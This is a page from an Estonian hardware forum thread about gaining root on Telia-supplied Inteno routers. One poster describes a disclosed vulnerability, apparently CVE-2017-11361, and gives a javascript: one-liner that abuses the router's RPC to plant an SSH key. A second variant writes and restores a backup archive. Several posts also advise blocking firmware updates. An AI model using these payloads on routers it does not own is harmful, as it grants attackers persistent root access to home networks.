Avaleht
uus teema   vasta Uudised »  Riistvara »  Inteno DG301 ruuter märgi kõik teemad loetuks
märgi mitteloetuks
vaata eelmist teemat :: vaata järgmist teemat
mine lehele eelmine  1, 2, 3 ... 90, 91, 92 ... 116, 117, 118  järgmine
Hinnavaatlus :: Foorum :: Uudised :: Ärifoorumid :: HV F1 ennustusvõistlus :: Pangalink :: Telekavad :: HV toote otsing
autor
sõnum Saada viide sõbrale. Teata moderaatorile
otsing:  
KillFrenzy
HV Guru
KillFrenzy

liitunud: 05.04.2003



Autoriseeritud ID-kaardiga

sõnum 13.07.2017 11:21:10 vasta tsitaadiga

neonsea, siin samas teemas pakkusin root accessi. Oleksid üle ssh saanud kohe root accessi. Ipkg väga palju tolku pole, enamus asju tööle ei hakka. Sain menüüse küll torrent kliendi valiku aga sellega asi piirdus icon_biggrin.gif
_________________
M: SFP Telia GPON võrgu jaoks - 40€
Kommentaarid: 149 loe/lisa Kasutajad arvavad:  :: 0 :: 1 :: 132
tagasi üles
vaata kasutaja infot saada privaatsõnum
neonsea
HV vaatleja
neonsea

liitunud: 13.07.2017




sõnum 13.07.2017 11:38:16 vasta tsitaadiga

KillFrenzy kirjutas:
neonsea, siin samas teemas pakkusin root accessi. Oleksid üle ssh saanud kohe root accessi. Ipkg väga palju tolku pole, enamus asju tööle ei hakka. Sain menüüse küll torrent kliendi valiku aga sellega asi piirdus icon_biggrin.gif

Õigus. Kahju, et su postitust varem ei näinud. Aga siiski on hea enda versioon kompailida. Saad muuta sõna otseses mõttes kõike, aga ehk see ongi rohkem power-useritele mõeldud. Hakkasin kirjutama sellele ruuterile softi, millel on lisaks tavavõimalustele ka "recon/audit" mode - midagi sarnast Wifi Pineapple'ga. Muutsin "Eco" nupu ruuteri küljel selle moodi toggle'iks.

Samuti, see "rootimise viis" ei kao uute fw'dega ära, kuna enda compilitud fw on alati kõige uuem. Väga tihti veel uuem, kui sel hetkel "ametlikult" väljas olev fw, kuna sa compilid Inteno enda algkoodist.
Kommentaarid: 1 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 0
tagasi üles
vaata kasutaja infot saada privaatsõnum
KillFrenzy
HV Guru
KillFrenzy

liitunud: 05.04.2003



Autoriseeritud ID-kaardiga

sõnum 13.07.2017 11:42:03 vasta tsitaadiga

Tv peaks ka töötama, kogu conf võimalik telia fw'st kopeerida.
_________________
M: SFP Telia GPON võrgu jaoks - 40€
Kommentaarid: 149 loe/lisa Kasutajad arvavad:  :: 0 :: 1 :: 132
tagasi üles
vaata kasutaja infot saada privaatsõnum
neonsea
HV vaatleja
neonsea

liitunud: 13.07.2017




sõnum 13.07.2017 11:49:22 vasta tsitaadiga

KillFrenzy kirjutas:
Tv peaks ka töötama, kogu conf võimalik telia fw'st kopeerida.

Hea teada! Kui sul on hetkel root, kas oleks võimalik see conf enda ruuterist kopeerida ja mulle nt sõnumiga saata? Oleks väga tänuväärne!

Ilmselt saaksin selle ka enda fw dumpist kätte, aga hetkel asub see dump töö serveritel ning mingi jorss suutis VPN serveri confi pekki keerata ning ma ei pääse oma asjadele ligi.

Samuti, oled sa teadlik kas stock fw admin kasutajal on veebipaneelis võimalus enda fw üles laadida?
Kommentaarid: 1 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 0
tagasi üles
vaata kasutaja infot saada privaatsõnum
warwas
HV Guru
warwas

liitunud: 06.07.2003



Autoriseeritud ID-kaardiga

sõnum 13.07.2017 13:57:17 vasta tsitaadiga

KillFrenzy kirjutas:
... Ipkg väga palju tolku pole, enamus asju tööle ei hakka. Sain menüüse küll torrent kliendi valiku aga sellega asi piirdus icon_biggrin.gif

KillFrenzy, OpenVPN'i oled proovinud? Kas see iseenesest hakkaks Telia softiga tööle või tuleks samamoodi plats täitsa puhtaks lüüa?
Kommentaarid: 243 loe/lisa Kasutajad arvavad:  :: 0 :: 3 :: 221
tagasi üles
vaata kasutaja infot saada privaatsõnum
KillFrenzy
HV Guru
KillFrenzy

liitunud: 05.04.2003



Autoriseeritud ID-kaardiga

sõnum 13.07.2017 14:28:33 vasta tsitaadiga

warwas, see peaks töötama, varasemas telia versioonis oli see ka vist olemas. DDNS hakkas küll tööle.
_________________
M: SFP Telia GPON võrgu jaoks - 40€
Kommentaarid: 149 loe/lisa Kasutajad arvavad:  :: 0 :: 1 :: 132
tagasi üles
vaata kasutaja infot saada privaatsõnum
(b)itiboy
HV kasutaja

liitunud: 29.12.2003




sõnum 13.07.2017 17:37:16 vasta tsitaadiga

neonsea kirjutas:
KillFrenzy kirjutas:
Tv peaks ka töötama, kogu conf võimalik telia fw'st kopeerida.

Hea teada! Kui sul on hetkel root, kas oleks võimalik see conf enda ruuterist kopeerida ja mulle nt sõnumiga saata? Oleks väga tänuväärne!

Ilmselt saaksin selle ka enda fw dumpist kätte, aga hetkel asub see dump töö serveritel ning mingi jorss suutis VPN serveri confi pekki keerata ning ma ei pääse oma asjadele ligi.

Samuti, oled sa teadlik kas stock fw admin kasutajal on veebipaneelis võimalus enda fw üles laadida?

Jah on
Kommentaarid: 3 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 3
tagasi üles
vaata kasutaja infot saada privaatsõnum
neonsea
HV vaatleja
neonsea

liitunud: 13.07.2017




sõnum 13.07.2017 17:44:07 vasta tsitaadiga

(b)itiboy kirjutas:
neonsea kirjutas:
KillFrenzy kirjutas:
Tv peaks ka töötama, kogu conf võimalik telia fw'st kopeerida.

Hea teada! Kui sul on hetkel root, kas oleks võimalik see conf enda ruuterist kopeerida ja mulle nt sõnumiga saata? Oleks väga tänuväärne!

Ilmselt saaksin selle ka enda fw dumpist kätte, aga hetkel asub see dump töö serveritel ning mingi jorss suutis VPN serveri confi pekki keerata ning ma ei pääse oma asjadele ligi.

Samuti, oled sa teadlik kas stock fw admin kasutajal on veebipaneelis võimalus enda fw üles laadida?

Jah on

Väga hea! Tähendab, et kui sul on root ligipääs, siis ei pea sa isegi seda lahti kangutama nagu ma tegin.
Kommentaarid: 1 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 0
tagasi üles
vaata kasutaja infot saada privaatsõnum
indrpo
HV Guru

liitunud: 14.11.2004




sõnum 13.07.2017 17:49:28 vasta tsitaadiga

mitte et see teid aitaks aga selleks ei pea superuser olema.

hoiad resetti all, surud voolu sisse ja pika mõtlemise peale on seade recovery modes, veebis avaneb browse valik, lase soft selga.
beware, failisüsteem on ka oluline, uute softidega seadmed mingit vana softi enam ei tunnista.
iseasi kuskohast te neid softe võtate ja modite.
Kommentaarid: 253 loe/lisa Kasutajad arvavad:  :: 1 :: 0 :: 223
tagasi üles
vaata kasutaja infot saada privaatsõnum
neonsea
HV vaatleja
neonsea

liitunud: 13.07.2017




sõnum 13.07.2017 17:54:59 vasta tsitaadiga

indrekp kirjutas:
mitte et see teid aitaks aga selleks ei pea superuser olema.

hoiad resetti all, surud voolu sisse ja pika mõtlemise peale on seade recovery modes, veebis avaneb browse valik, lase soft selga.
beware, failisüsteem on ka oluline, uute softidega seadmed mingit vana softi enam ei tunnista.
iseasi kuskohast te neid softe võtate ja modite.

Mul ei avanenud bootloader/recovery mode resetti all hoides ning voolu sisse lükkamisel. Ei tea, mida ma valesti tegin. Aga aitäh, lisan selle oma blogipostitusse.
Kommentaarid: 1 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 0
tagasi üles
vaata kasutaja infot saada privaatsõnum
(b)itiboy
HV kasutaja

liitunud: 29.12.2003




sõnum 13.07.2017 18:13:01 vasta tsitaadiga

neonsea kirjutas:
indrekp kirjutas:
mitte et see teid aitaks aga selleks ei pea superuser olema.

hoiad resetti all, surud voolu sisse ja pika mõtlemise peale on seade recovery modes, veebis avaneb browse valik, lase soft selga.
beware, failisüsteem on ka oluline, uute softidega seadmed mingit vana softi enam ei tunnista.
iseasi kuskohast te neid softe võtate ja modite.

Mul ei avanenud bootloader/recovery mode resetti all hoides ning voolu sisse lükkamisel. Ei tea, mida ma valesti tegin. Aga aitäh, lisan selle oma blogipostitusse.

Ruuter lubab ainult .1.7 IP pealt. Pead static IP arvutile panema.
Kommentaarid: 3 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 3
tagasi üles
vaata kasutaja infot saada privaatsõnum
neonsea
HV vaatleja
neonsea

liitunud: 13.07.2017




sõnum 17.07.2017 16:29:31 vasta tsitaadiga

Leidsin viisi hiljutisemal Telia fw'l root ligipääs saada.

Vaja ainult kasutaja "user" salasõna teada.

EDIT: Kes huvitatud, siis kirjutasin sellest turvaaugust siin: https://neonsea.uk/blog/2017/07/17/cve-2017-11361.html

Hetkel vajab see natuke käsitsi requestide manipuleerimist, kuid kes kannatab oodata, siis kirjutan varsti skripti, mis automaatselt ruuteri ära ruudib. Soovitan automaatsed update'id kuidagi ära blokkida, sest uuem FW ilmselt blokib selle ära. Kirjutasin ka Intenole sellest turvaaugust, kes olid selle üle väga tänulikud. icon_smile.gif
Kommentaarid: 1 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 0
tagasi üles
vaata kasutaja infot saada privaatsõnum
Adebisi
Kreisi kasutaja

liitunud: 05.07.2003



Autoriseeritud ID-kaardiga

sõnum 17.07.2017 18:56:37 vasta tsitaadiga

neonsea kirjutas:
Leidsin viisi hiljutisemal Telia fw'l root ligipääs saada.

Vaja ainult kasutaja "user" salasõna teada.

EDIT: Kes huvitatud, siis kirjutasin sellest turvaaugust siin: https://neonsea.uk/blog/2017/07/17/cve-2017-11361.html

Hetkel vajab see natuke käsitsi requestide manipuleerimist, kuid kes kannatab oodata, siis kirjutan varsti skripti, mis automaatselt ruuteri ära ruudib. Soovitan automaatsed update'id kuidagi ära blokkida, sest uuem FW ilmselt blokib selle ära. Kirjutasin ka Intenole sellest turvaaugust, kes olid selle üle väga tänulikud. icon_smile.gif


Huvi pärast katsetasin, toimib jah icon_lol.gif beer_yum.gif
Kommentaarid: 58 loe/lisa Kasutajad arvavad:  :: 0 :: 1 :: 55
tagasi üles
vaata kasutaja infot saada privaatsõnum
jägaja
HV Guru
jägaja

liitunud: 06.08.2004




sõnum 17.07.2017 21:59:22 vasta tsitaadiga

Ahh, ärga jamage. Telia ruuter on alati kõige turvalisem ja uusima firmvarega, nagu Fort Knox. icon_cool.gif
_________________
" Maailm on täis kõikvõimalike külatarkade kogukondi, kelle ühine joon on teadus- ja tõenduspõhisele elukäsitusele vastandumine."
Kommentaarid: 132 loe/lisa Kasutajad arvavad:  :: 1 :: 0 :: 119
tagasi üles
vaata kasutaja infot saada privaatsõnum
neonsea
HV vaatleja
neonsea

liitunud: 13.07.2017




sõnum 18.07.2017 16:49:59 vasta tsitaadiga

Tundub, et järgmise FW versiooniga läheb paar asja katki:

https://www.upload.ee/image/7241414/Screenshot_20170718-174652.jpg

"Customer" antud kontekstis on Telia.
Kommentaarid: 1 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 0
tagasi üles
vaata kasutaja infot saada privaatsõnum
(b)itiboy
HV kasutaja

liitunud: 29.12.2003




sõnum 18.07.2017 18:37:08 vasta tsitaadiga

neonsea kirjutas:
Tundub, et järgmise FW versiooniga läheb paar asja katki:

https://www.upload.ee/image/7241414/Screenshot_20170718-174652.jpg

"Customer" antud kontekstis on Telia.

Seal kirjeldatakse ju olemasoleva FW quick fixi. Ja tavakasutajal nagunii polnud neile featuuridele ligipääsu GUIs. Nii, et katki ei lähe midagi icon_cool.gif .
Kommentaarid: 3 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 3
tagasi üles
vaata kasutaja infot saada privaatsõnum
neonsea
HV vaatleja
neonsea

liitunud: 13.07.2017




sõnum 21.07.2017 11:11:58 vasta tsitaadiga

(b)itiboy kirjutas:
neonsea kirjutas:
Tundub, et järgmise FW versiooniga läheb paar asja katki:

https://www.upload.ee/image/7241414/Screenshot_20170718-174652.jpg

"Customer" antud kontekstis on Telia.

Seal kirjeldatakse ju olemasoleva FW quick fixi. Ja tavakasutajal nagunii polnud neile featuuridele ligipääsu GUIs. Nii, et katki ei lähe midagi icon_cool.gif .

Tõsi, viimase asja peale ei tulnudki, et tavakasutajal nendele ligipääsu pole. Quick fix tehakse ja ilmselt deploy'itakse laiali täna või homme.

EDIT: Lisasin blogisse ka one-lineri, mis lisab süsteemi automaatselt SSH võtme. Genereeri see enne ning kleebi see oma URL ribasse:

javascript:var key = prompt("Enter SSH key to add");$rpc.$call("file", "write", {path:"/tmp/tmpSshKey", data:key});$rpc.$call("router.dropbear", "add_ssh_key", {path:"/tmp/tmpSshKey"});alert("Request sent, try logging in");


Jälgi, et
javascript:
ikka ette jääks, muidu ei toimi. Kui küsib võtit, siis kleebi sinna oma public SSH võti.


EDIT 2: Tundub, et turvaauk on parandatud. Aeg järgmist otsima hakata. icon_lol.gif

EDIT 3: Turvaauk leitud. icon_cool.gif


viimati muutis neonsea 24.07.2017 14:54:17, muudetud 1 kord
Kommentaarid: 1 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 0
tagasi üles
vaata kasutaja infot saada privaatsõnum
johnbrown
HV vaatleja

liitunud: 22.01.2014




sõnum 21.07.2017 18:57:21 vasta tsitaadiga

neonsea Kas konsoolil peaks one-liner olema midagi sellist?

$rpc.$call("file", "write", {path:"/tmp/backup.tar.gz", data:"xxxxxxxx", "base64": true});$rpc.$call("juci.sysupgrade", "restore-backup", {});

xxxxxxxx on siis base64 kodeeritud backup.tar.gz
tagasi üles
vaata kasutaja infot saada privaatsõnum
neonsea
HV vaatleja
neonsea

liitunud: 13.07.2017




sõnum 21.07.2017 21:02:47 vasta tsitaadiga

johnbrown kirjutas:
neonsea Kas konsoolil peaks one-liner olema midagi sellist?

$rpc.$call("file", "write", {path:"/tmp/backup.tar.gz", data:"xxxxxxxx", "base64": true});$rpc.$call("juci.sysupgrade", "restore-backup", {});

xxxxxxxx on siis base64 kodeeritud backup.tar.gz


Just nii, tundub õige.
Kommentaarid: 1 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 0
tagasi üles
vaata kasutaja infot saada privaatsõnum
Etz
HV Guru
Etz

liitunud: 27.01.2005



Autoriseeritud ID-kaardiga

sõnum 21.07.2017 23:09:59 vasta tsitaadiga

neonsea, kusjuures mulle tundub, et /tmp/ pole DG400 peal writable... icon_rolleyes.gif

Spoiler Spoiler Spoiler


Write katse enda peale öeldakse aga nii:
Spoiler Spoiler Spoiler


Testiks proovisin ka suvalist 10kB faili kirjutada sinna, üle base64 encode, tulemusena igatahes flashi kasutus ei muutunud, seega ilmselt ei kirjutatud sinna siiski kolbigi.

_________________
...life is random...so am I...
So, there is a fan. Time to grab your sh*t, gentlemen!
Kommentaarid: 223 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 192
tagasi üles
vaata kasutaja infot saada privaatsõnum
neonsea
HV vaatleja
neonsea

liitunud: 13.07.2017




sõnum 27.07.2017 00:07:02 vasta tsitaadiga

Etz kirjutas:
neonsea, kusjuures mulle tundub, et /tmp/ pole DG400 peal writable... icon_rolleyes.gif

Spoiler Spoiler Spoiler


Write katse enda peale öeldakse aga nii:
Spoiler Spoiler Spoiler


Testiks proovisin ka suvalist 10kB faili kirjutada sinna, üle base64 encode, tulemusena igatahes flashi kasutus ei muutunud, seega ilmselt ei kirjutatud sinna siiski kolbigi.


Huvitav, hea teada. Endal on testimiseks vaid DG200 ning DG301. Inteno saatis mulle tänutäheks ühe ruuteri ning wifi-extenderi. Ei tea mudeleid, aga on võimalus, et see ruuter tuleb DG400, siis saan ka sellel testida.

Huvitav, mis juhtuks, kui sa enne restore-backup'i create-backup jooksutaks?

edit: sain DG400A ning EX400, saan nende peal nüüd ka testida. Võtsin ajutiselt Inteno palvel viimase blogipostituse maha, panen uuesti üles kui nad selle ära parandanud on. Jällegi, soovitan automaatsed update'id ära blokkida, nt suunates kõik pordid masinale, kus need pordid kinni on.
Kommentaarid: 1 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 0
tagasi üles
vaata kasutaja infot saada privaatsõnum
KillFrenzy
HV Guru
KillFrenzy

liitunud: 05.04.2003



Autoriseeritud ID-kaardiga

sõnum 06.08.2017 18:46:35 vasta tsitaadiga

Keegi DG301 firmware saaks jagada, prooviks uuendada enne kui kirvega puruks peksta.
_________________
M: SFP Telia GPON võrgu jaoks - 40€
Kommentaarid: 149 loe/lisa Kasutajad arvavad:  :: 0 :: 1 :: 132
tagasi üles
vaata kasutaja infot saada privaatsõnum
indrpo
HV Guru

liitunud: 14.11.2004




sõnum 06.08.2017 19:11:55 vasta tsitaadiga

KillFrenzy kirjutas:
Keegi DG301 firmware saaks jagada, prooviks uuendada enne kui kirvega puruks peksta.


reset ja saad automaatselt viimase. puruks võib midagi muud peksta, ruuter ju töötab kui korras on.
Sa oled vist ju üks neist kes kangesti tahtis seda shaatada ja oma aretust seal sees teha?
Kommentaarid: 253 loe/lisa Kasutajad arvavad:  :: 1 :: 0 :: 223
tagasi üles
vaata kasutaja infot saada privaatsõnum
KillFrenzy
HV Guru
KillFrenzy

liitunud: 05.04.2003



Autoriseeritud ID-kaardiga

sõnum 06.08.2017 19:29:03 vasta tsitaadiga

indrekp, mu ruuter on korras, sõber tahtis proovida. Teeb mingeid lolluseid, bootib nagu üles aga kõik tuled vilguvad ja neti ei saa enam. VDSL otsas.
_________________
M: SFP Telia GPON võrgu jaoks - 40€
Kommentaarid: 149 loe/lisa Kasutajad arvavad:  :: 0 :: 1 :: 132
tagasi üles
vaata kasutaja infot saada privaatsõnum
indrpo
HV Guru

liitunud: 14.11.2004




sõnum 06.08.2017 19:39:09 vasta tsitaadiga

KillFrenzy kirjutas:
indrekp, mu ruuter on korras, sõber tahtis proovida. Teeb mingeid lolluseid, bootib nagu üles aga kõik tuled vilguvad ja neti ei saa enam. VDSL otsas.

välk ja pauk? tundub loomulik ja soft mingid DSL osa püsti ei tõsta.
Kommentaarid: 253 loe/lisa Kasutajad arvavad:  :: 1 :: 0 :: 223
tagasi üles
vaata kasutaja infot saada privaatsõnum
näita postitusi alates eelmisest:   
uus teema   vasta Uudised »  Riistvara »  Inteno DG301 ruuter mine lehele eelmine  1, 2, 3 ... 90, 91, 92 ... 116, 117, 118  järgmine
[vaata eelmist teemat] [vaata järgmist teemat]
 lisa lemmikuks
näita foorumit:  
 ignoreeri teemat 
sa ei või postitada uusi teemasid siia foorumisse
sa ei või vastata selle foorumi teemadele
sa ei või muuta oma postitusi selles foorumis
sa ei või kustutada oma postitusi selles foorumis
sa ei või vastata küsitlustele selles foorumis
sa ei saa lisada manuseid selles foorumis
sa võid manuseid alla laadida selles foorumis



Hinnavaatlus ei vastuta foorumis tehtud postituste eest.